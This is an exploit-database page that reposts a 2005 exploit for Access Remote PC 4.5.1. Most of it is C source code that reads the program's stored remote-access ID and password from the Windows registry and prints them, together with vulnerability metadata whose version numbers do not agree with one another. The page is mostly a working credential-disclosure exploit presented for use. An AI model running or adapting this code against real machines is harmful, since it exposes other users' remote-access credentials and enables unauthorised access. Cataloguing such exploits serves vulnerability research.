Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

vendor:

Access Remote PC

by:

Kozan

7.5

CVSS

HIGH

Local Password Disclosure

200

CWE

Product Name: Access Remote PC

Affected Version From: 4.5.2001

Affected Version To: 4.5.2001

Patch Exists: NO

Related CWE: N/A

CPE: a:access-remote-pc:access_remote_pc

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2005

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Access Remote PC 4.5.1 discloses passwords to local users.

Mitigation:

Ensure that Access Remote PC is not installed on the system.

Source

Exploit-DB raw data:

/*****************************************************************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

int main()
{
       HKEY hKey;
       char RPCNumber[BUF], Password[BUF];
       DWORD dwBuf = BUF;

       if( RegOpenKeyEx( HKEY_CURRENT_USER,
                         "Software\\Access Remote PC\\Client\\Options\\Proxy",
                         0,
                         KEY_QUERY_VALUE,
                         &hKey
                         ) !=ERROR_SUCCESS )
       {
               fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
               return -1;
       }

       if( RegQueryValueEx( hKey,
                            "RPCNumber",
                            NULL,
                            NULL,
                            (BYTE *)&RPCNumber,
                            &dwBuf
                            ) != ERROR_SUCCESS )
       lstrcpy( RPCNumber,"Not Found!\n" );

       if( RegQueryValueEx( hKey,
                            "Password",
                            NULL,
                            NULL,
                            (BYTE *)&Password,
                            &dwBuf
                            ) != ERROR_SUCCESS )
       lstrcpy( Password,"Not Found!\n" );

       fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
       fprintf( stdout, "Credits to AtmaCA\n" );
       fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
       fprintf( stdout, "kozan@netmagister.com\n\n" );
       fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
       fprintf( stdout, "Password\t: %s\n", Password );

       return 0;
}

// milw0rm.com [2005-07-04]